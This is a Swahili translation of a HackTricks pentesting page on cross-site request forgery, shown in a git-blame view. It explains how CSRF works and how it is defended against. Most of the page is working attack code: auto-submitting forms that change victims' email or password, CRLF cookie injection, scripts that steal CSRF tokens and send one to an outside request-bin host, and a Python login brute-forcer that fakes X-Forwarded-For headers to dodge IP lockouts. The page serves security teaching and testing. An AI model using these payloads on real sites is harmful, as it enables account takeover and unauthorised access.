hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

616 lines
26 KiB
Markdown
Raw Normal View History

2022-04-28 23:27:22 +00:00
# CSRF (Cross Site Request Forgery)
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:25:17 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-02-27 09:28:45 +00:00
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa zawadi za mdudu!
2023-02-27 09:28:45 +00:00
2024-02-11 02:13:58 +00:00
**Machapisho ya Kudukua**\
Shiriki na maudhui yanayochimba kina katika msisimko na changamoto za kudukua
2023-02-27 09:28:45 +00:00
**Machapisho ya Kudukua ya Wakati Halisi**\
Kaa sawa na ulimwengu wa kudukua wenye kasi kupitia habari za wakati halisi na ufahamu
2023-07-14 15:03:41 +00:00
**Matangazo Mapya**\
Baki mwelekezwa na matangazo mapya ya zawadi za mdudu yanayoanzishwa na sasisho muhimu za jukwaa
2023-07-14 15:03:41 +00:00
2024-02-11 02:13:58 +00:00
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
2022-10-27 23:22:18 +00:00
## Kuelezea Cross-Site Request Forgery (CSRF)
**Cross-Site Request Forgery (CSRF)** ni aina ya udhaifu wa usalama unaopatikana kwenye programu za wavuti. Inawezesha wadukuzi kutekeleza vitendo kwa niaba ya watumiaji wasio na shaka kwa kudanganya vikao vyao vilivyothibitishwa. Shambulio hutekelezwa wakati mtumiaji, ambaye ameingia kwenye jukwaa la muathirika, anatembelea tovuti yenye nia mbaya. Tovuti hii kisha huanzisha maombi kwa akaunti ya muathirika kupitia njia kama kutekeleza JavaScript, kuwasilisha fomu, au kupata picha.
2024-02-11 02:13:58 +00:00
### Masharti ya Shambulio la CSRF
Kutumia udhaifu wa CSRF, hali kadhaa lazima zikutane:
1. **Tambua Kitendo cha Thamani**: Mshambuliaji lazima apate kitendo cha thamani cha kudukua, kama vile kubadilisha nenosiri la mtumiaji, barua pepe, au kuinua mamlaka.
2. **Usimamizi wa Kikao**: Kikao cha mtumiaji lazima kisimamiwe tu kupitia vidakuzi au kichwa cha Uthibitishaji wa Msingi wa HTTP, kwani vichwa vingine haviwezi kudhibitiwa kwa kusudi hili.
3. **Kutokuwepo kwa Parameta Zisizotabirika**: Ombi halipaswi kuwa na parameta zisizotabirika, kwani zinaweza kuzuia shambulio.
### Ukaguzi Haraka
Unaweza **kukamata ombi katika Burp** na ukague ulinzi wa CSRF na kujaribu kutoka kwenye kivinjari unaweza bonyeza **Nakili kama fetch** na ukague ombi:
<figure><img src="../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
### Kujilinda Dhidi ya CSRF
Mbinu kadhaa za kujilinda zinaweza kutekelezwa kulinda dhidi ya mashambulio ya CSRF:
* [**Vidakuzi vya SameSite**](hacking-with-cookies/#samesite): Sifa hii inazuia kivinjari kutuma vidakuzi pamoja na maombi kutoka kwenye tovuti nyingine. [Zaidi kuhusu Vidakuzi vya SameSite](hacking-with-cookies/#samesite).
* [**Kushiriki rasilimali kati ya asili**](cors-bypass.md): Sera ya CORS ya tovuti ya muathirika inaweza kuathiri uwezekano wa shambulio, hasa ikiwa shambulio linahitaji kusoma jibu kutoka kwenye tovuti ya muathirika. [Jifunze kuhusu kuzidi kwa CORS](cors-bypass.md).
* **Uthibitishaji wa Mtumiaji**: Kuuliza nenosiri la mtumiaji au kutatua captcha kunaweza kuthibitisha nia ya mtumiaji.
* **Kuangalia Vichwa vya Referrer au Asili**: Kuthibitisha vichwa hivi kunaweza kusaidia kuhakikisha maombi yanatoka kwenye vyanzo vinavyoaminika. Walakini, kutengeneza kwa uangalifu wa URL kunaweza kuepuka ukaguzi uliofanywa vibaya, kama vile:
* Kutumia `http://mal.net?orig=http://example.com` (URL inaishia na URL inayotegemewa)
* Kutumia `http://example.com.mal.net` (URL inaanza na URL inayotegemewa)
* **Kubadilisha Majina ya Parameta**: Kubadilisha majina ya parameta katika maombi ya POST au GET kunaweza kusaidia kuzuia mashambulio ya kiotomatiki.
* **Vidakuzi vya CSRF**: Kuingiza kitambulisho cha CSRF kipekee katika kila kikao na kuhitaji kitambulisho hiki katika maombi yanayofuata kunaweza kupunguza hatari ya CSRF kwa kiasi kikubwa. Ufanisi wa kitambulisho unaweza kuimarishwa kwa kutekeleza CORS.
2024-02-11 02:13:58 +00:00
Kuelewa na kutekeleza ulinzi huu ni muhimu kwa kudumisha usalama na uadilifu wa programu za wavuti.
## Kuvuka Ulinzi
2024-02-11 02:13:58 +00:00
### Kutoka POST hadi GET
Labda fomu unayotaka kutumia ni tayari kutuma **ombi la POST na kitambulisho cha CSRF lakini**, unapaswa **kuangalia** ikiwa **GET** pia ni **halali** na ikiwa unapotuma ombi la GET **kitambulisho cha CSRF bado kinathibitishwa**.
2024-02-11 02:13:58 +00:00
### Kutokuwepo kwa kitambulisho
Programu zinaweza kutekeleza mbinu za **kuthibitisha vitambulisho** wanapokuwepo. Walakini, udhaifu unatokea ikiwa uthibitishaji unapuuzwa kabisa wakati kitambulisho hakipo. Wadukuzi wanaweza kutumia hili kwa **kuondoa parameta** inayobeba kitambulisho, si tu thamani yake. Hii inaruhusu kuzunguka mchakato wa uthibitishaji na kutekeleza shambulio la Kuvuka Ombi la Tovuti (CSRF) kwa ufanisi.
### Kitambulisho cha CSRF hakihusishwi na kikao cha mtumiaji
Programu zisizohusisha vitambulisho vya CSRF na vikao vya watumiaji zinaleta hatari kubwa ya usalama. Mifumo hii huthibitisha vitambulisho dhidi ya **mtungi wa jumla** badala ya kuhakikisha kila kitambulisho kimefungwa kwenye kikao kinachoanzisha.
Hivi ndivyo wadukuzi wanavyotumia hili:
1. **Thibitisha** kwa kutumia akaunti yao wenyewe.
2. **Pata kitambulisho cha CSRF halali** kutoka kwenye mtungi wa jumla.
3. **Tumia kitambulisho hiki** katika shambulio la CSRF dhidi ya muathirika.
2024-02-05 20:00:40 +00:00
Udhaifu huu huruhusu wadukuzi kufanya maombi yasiyoruhusiwa kwa niaba ya muathirika, kwa kutumia mbinu dhaifu ya uthibitishaji wa kitambulisho.
2024-02-05 20:00:40 +00:00
### Kuvuka njia
2024-02-05 20:00:40 +00:00
Ikiwa ombi linatumia "**njia isiyo ya kawaida**", angalia ikiwa **kazi ya kubadilisha njia** inafanya kazi. Kwa mfano, ikiwa inatumia njia ya **KUWEKA** unaweza kujaribu kutumia njia ya **POST** na **tuma**: _https://mfano.com/my/dear/api/val/num?**\_method=KUWEKA**_
Hii inaweza pia kufanya kazi kwa kutuma **parameta ya \_method ndani ya ombi la POST** au kutumia **vichwa**:
2021-11-30 16:46:07 +00:00
* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_
### Kuvuka kitambulisho cha kichwa cha desturi
Ikiwa ombi linaweka **kichwa cha desturi** na **kitambulisho** kwenye ombi kama **njia ya ulinzi wa CSRF**, basi:
* Jaribu ombi bila **Kitambulisho Kilichobinafsishwa na pia kichwa.**
* Jaribu ombi na urefu **sahihi lakini kitambulisho tofauti**.
### Kitambulisho cha CSRF kinathibitishwa na kuki
Programu zinaweza kutekeleza ulinzi wa CSRF kwa kuiga kitambulisho katika kuki na parameta ya ombi au kwa kuweka kuki ya CSRF na kuthibitisha ikiwa kitambulisho kilichotumwa kwenye seva kinalingana na kuki. Programu huthibitisha maombi kwa kuangalia ikiwa kitambulisho katika parameta ya ombi linalingana na thamani kwenye kuki.
Walakini, njia hii inaweza kuwa dhaifu kwa mashambulio ya CSRF ikiwa tovuti ina dosari zinazoruhusu mshambuliaji kuweka kuki ya CSRF kwenye kivinjari cha muathirika, kama vile dosari ya CRLF. Mshambuliaji anaweza kutumia hili kwa kupakia picha ya kudanganya ambayo inaweka kuki, kisha kuanzisha shambulio la CSRF.
Hapa kuna mfano wa jinsi shambulio linavyoweza kuandaliwa:
2021-11-30 16:46:07 +00:00
```html
<html>
2024-02-11 02:13:58 +00:00
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
2021-11-30 16:46:07 +00:00
</html>
2024-02-05 20:00:40 +00:00
2021-11-30 16:46:07 +00:00
```
{% hint style="info" %}
Tafadhali kumbuka kwamba ikiwa **tokeni ya csrf inahusiana na kuki ya kikao shambulio hili halitafanya kazi** kwa sababu utahitaji kuweka kikao cha mwathiriwa, na kwa hivyo utakuwa unajiwekea shambulio.
2021-11-30 16:46:07 +00:00
{% endhint %}
### Badilisha Aina ya Yaliyomo
2020-08-10 09:56:57 +00:00
Kulingana na [**hii**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), ili **kuepuka maombi ya awali** kutumia njia ya **POST** hizi ni thamani zinazoruhusiwa za Aina ya Yaliyomo:
- **`application/x-www-form-urlencoded`**
- **`multipart/form-data`**
- **`text/plain`**
Hata hivyo, kumbuka kwamba **mantiki za seva zinaweza kutofautiana** kulingana na **Aina ya Yaliyomo** iliyotumiwa hivyo unapaswa kujaribu thamani zilizotajwa na nyingine kama vile **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
2022-04-22 08:32:18 +00:00
2024-02-11 02:13:58 +00:00
Mfano (kutoka [hapa](https://brycec.me/posts/corctf\_2021\_challenges)) wa kutuma data ya JSON kama text/plain:
2022-04-22 08:32:18 +00:00
```html
<html>
2024-02-11 02:13:58 +00:00
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
2022-04-22 08:32:18 +00:00
</html>
```
### Kupita kwa Maombi ya Awali kwa Data ya JSON
Wakati unajaribu kutuma data ya JSON kupitia ombi la POST, kutumia `Content-Type: application/json` katika fomu ya HTML sio moja kwa moja inawezekana. Vivyo hivyo, kutumia `XMLHttpRequest` kutuma aina hii ya yaliyomo huanzisha ombi la awali. Walakini, kuna mikakati ya kuzidisha kikwazo hiki na kuangalia ikiwa seva inachakata data ya JSON bila kujali Content-Type:
1. **Tumia Aina Zingine za Yaliyomo**: Tumia `Content-Type: text/plain` au `Content-Type: application/x-www-form-urlencoded` kwa kuweka `enctype="text/plain"` katika fomu. Hii inajaribu ikiwa seva ya nyuma inatumia data bila kujali Content-Type.
2. **Badilisha Aina ya Yaliyomo**: Ili kuepuka ombi la awali wakati ikizingatiwa kuwa seva inatambua yaliyomo kama JSON, unaweza kutuma data na `Content-Type: text/plain; application/json`. Hii haizidishi ombi la awali lakini inaweza kuchakatwa kwa usahihi na seva ikiwa imeboreshwa kukubali `application/json`.
3. **Matumizi ya Faili ya SWF Flash**: Njia isiyo ya kawaida lakini inayowezekana inahusisha kutumia faili ya SWF flash kuzidisha vizuizi kama hivyo. Kwa uelewa wa kina wa mbinu hii, tazama [chapisho hili](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).
2022-02-21 15:48:28 +00:00
### Kupita kwa Uchunguzi wa Referrer / Asili
2024-02-11 02:13:58 +00:00
**Epuka Kichwa cha Referrer**
Maombi yanaweza kuthibitisha kichwa cha 'Referer' tu wakati kipo. Ili kuzuia kivinjari kutuma kichwa hiki, unaweza kutumia lebo ya meta ya HTML ifuatayo:
2024-02-05 20:00:40 +00:00
```xml
<meta name="referrer" content="never">
```
Hii inahakikisha kichwa cha 'Referer' kinaachwa, ikipitisha ukaguzi wa uthibitisho katika baadhi ya programu.
**Kupuuza Regexp**
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
Kuweka jina la kikoa la seva katika URL ambayo Referrer itatuma ndani ya paramita unaweza kufanya:
2021-11-30 16:46:07 +00:00
```html
<html>
2024-02-11 02:13:58 +00:00
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
2021-11-30 16:46:07 +00:00
</html>
```
### **Kupitisha njia ya kichwa**
2021-11-30 16:46:07 +00:00
Sehemu ya kwanza ya [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) inaeleza kwamba [Msimbo wa chanzo wa Oak](https://github.com/oakserver/oak/blob/main/router.ts#L281), router imewekwa kushughulikia **ombi za KICHWA kama ombi za GET** bila mwili wa jibu - suluhisho la kawaida ambalo si la pekee kwa Oak. Badala ya kushughulikia maalum ambayo inashughulikia ombi za KICHWA, zinapelekwa **kwa kushughulikiwa na kichwa cha GET lakini programu inaondoa mwili wa jibu**.
2023-02-27 09:28:45 +00:00
Hivyo, ikiwa ombi la GET linazuiliwa, unaweza tu **kupeleka ombi la KICHWA ambalo litashughulikiwa kama ombi la GET**.
2022-10-27 23:22:18 +00:00
## **Mifano ya Kutumia Njia**
### **Kuchota Kitambulisho cha CSRF**
Ikiwa **kitambulisho cha CSRF** kinatumika kama **ulinzi** unaweza kujaribu **kuchota** kwa kutumia [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) au [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **KUTUMIA GET kwa kutumia vitambulisho vya HTML**
2024-02-05 20:00:40 +00:00
```xml
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
Vivamishi vingine vya HTML5 vinavyoweza kutumika kutuma ombi la GET kiotomatiki ni:
2024-02-05 20:00:40 +00:00
```html
<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
2024-02-11 02:13:58 +00:00
body { background: url('...'); }
2024-02-05 20:00:40 +00:00
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">
```
### Ombi la kupata fomu
2024-02-05 20:00:40 +00:00
```html
<html>
2024-02-11 02:13:58 +00:00
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
2024-02-11 02:13:58 +00:00
### Ombi la POST la Fomu
2024-02-05 20:00:40 +00:00
```html
<html>
2024-02-11 02:13:58 +00:00
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>
2021-06-04 23:20:57 +00:00
```
### Kutuma ombi la POST la fomu kupitia iframe
2024-02-11 02:13:58 +00:00
```html
<!--
The request is sent through the iframe withuot reloading the page
2021-06-04 23:20:57 +00:00
-->
<html>
2024-02-11 02:13:58 +00:00
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
2021-06-04 23:20:57 +00:00
</html>
```
2024-02-11 02:13:58 +00:00
### **Ombi la POST la Ajax**
2024-02-05 20:00:40 +00:00
```html
<script>
var xh;
if (window.XMLHttpRequest)
2024-02-11 02:13:58 +00:00
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
2024-02-11 02:13:58 +00:00
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
2021-06-05 01:10:15 +00:00
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>
2021-06-05 01:10:15 +00:00
<script>
//JQuery version
$.ajax({
2024-02-11 02:13:58 +00:00
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
2021-06-05 01:10:15 +00:00
})
</script>
```
2024-02-11 02:13:58 +00:00
### Ombi la POST la multipart/form-data
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
2024-02-11 02:13:58 +00:00
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});
```
2024-02-11 02:13:58 +00:00
### Ombi la POST la multipart/form-data v2
```javascript
2024-02-05 20:00:40 +00:00
// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
2021-06-05 01:10:15 +00:00
xhr.withCredentials = true;
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
### Ombi la POST la Fomu kutoka ndani ya fremu
2024-02-05 20:00:40 +00:00
```html
<--! expl.html -->
<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>
<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```
### **Pora Token ya CSRF na tuma ombi la POST**
```javascript
function submitFormWithTokenJS(token) {
2024-02-11 02:13:58 +00:00
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
2024-02-11 02:13:58 +00:00
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2024-02-11 02:13:58 +00:00
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}
2024-02-11 02:13:58 +00:00
xhr.send("token=" + token + "&otherparama=heyyyy");
}
function getTokenJS() {
2024-02-11 02:13:58 +00:00
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}
var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
### **Pora Token ya CSRF na tuma ombi la Post kutumia iframe, fomu na Ajax**
2024-02-05 20:00:40 +00:00
```html
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>
<script type="text/javascript">
function f1(){
2024-02-11 02:13:58 +00:00
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;
document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
2024-02-11 02:13:58 +00:00
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
```
### **Pora Token ya CSRF na tuma ombi la POST kwa kutumia iframe na fomu**
2024-02-05 20:00:40 +00:00
```html
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
2024-02-11 02:13:58 +00:00
<script>
function read()
{
2024-02-11 02:13:58 +00:00
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php" enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>
```
### **Iba token na uitume ukitumia 2 iframes**
2024-02-05 20:00:40 +00:00
```html
<script>
var token;
function readframe1(){
2024-02-11 02:13:58 +00:00
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
2024-02-11 02:13:58 +00:00
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>
2024-02-11 02:13:58 +00:00
<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
2024-02-11 02:13:58 +00:00
<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
2024-02-11 02:13:58 +00:00
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
```
### **POSTSteal CSRF token with Ajax and send a post with a form**
### **POSTIba CSRF token na Ajax na utume posta na fomu**
2024-02-05 20:00:40 +00:00
```html
<body onload="getData()">
<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
2024-02-11 02:13:58 +00:00
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>
<script>
var x = new XMLHttpRequest();
function getData() {
2024-02-11 02:13:58 +00:00
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
2024-02-11 02:13:58 +00:00
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>
```
2024-02-11 02:13:58 +00:00
### CSRF na Socket.IO
2024-02-05 20:00:40 +00:00
```html
2020-08-06 20:38:54 +00:00
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');
const username = 'admin'
socket.on('connect', () => {
2024-02-11 02:13:58 +00:00
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})
2020-08-06 20:38:54 +00:00
});
</script>
```
## Kuvunja Nguvu ya Kuingia kwa CSRF
2020-08-06 20:38:54 +00:00
Msimbo unaweza kutumika kuvunja nguvu fomu ya kuingia kwa kutumia tokeni ya CSRF (Pia inatumia kichwa cha X-Forwarded-For kujaribu kukiuka uwezekano wa kuzuia anwani ya IP):
2020-11-06 18:22:38 +00:00
```python
import request
import re
import random
URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"
def init_session():
2024-02-11 02:13:58 +00:00
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie
2020-11-06 18:22:38 +00:00
def login(user, password):
2024-02-11 02:13:58 +00:00
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True
2020-11-06 18:22:38 +00:00
with open(PASS_LIST, "r") as f:
2024-02-11 02:13:58 +00:00
for line in f:
login(USER, line.strip())
2020-11-06 18:22:38 +00:00
```
## Vifaa <a href="#tools" id="tools"></a>
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
2022-09-26 09:52:47 +00:00
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
2024-02-11 02:13:58 +00:00
## Marejeo
* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
2024-02-05 20:00:40 +00:00
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
2023-02-27 09:28:45 +00:00
**Machapisho ya Kudukua**\
Shiriki na maudhui yanayochimba kina katika msisimko na changamoto za kudukua
2022-10-27 23:22:18 +00:00
**Taarifa za Kudukua Halisi**\
Kaa up-to-date na ulimwengu wa kudukua wenye kasi kupitia habari na ufahamu wa wakati halisi
2023-02-27 09:28:45 +00:00
**Matangazo ya Karibuni**\
Baki mwenye habari na tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
2023-02-27 09:28:45 +00:00
2024-02-11 02:13:58 +00:00
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-31 01:25:17 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
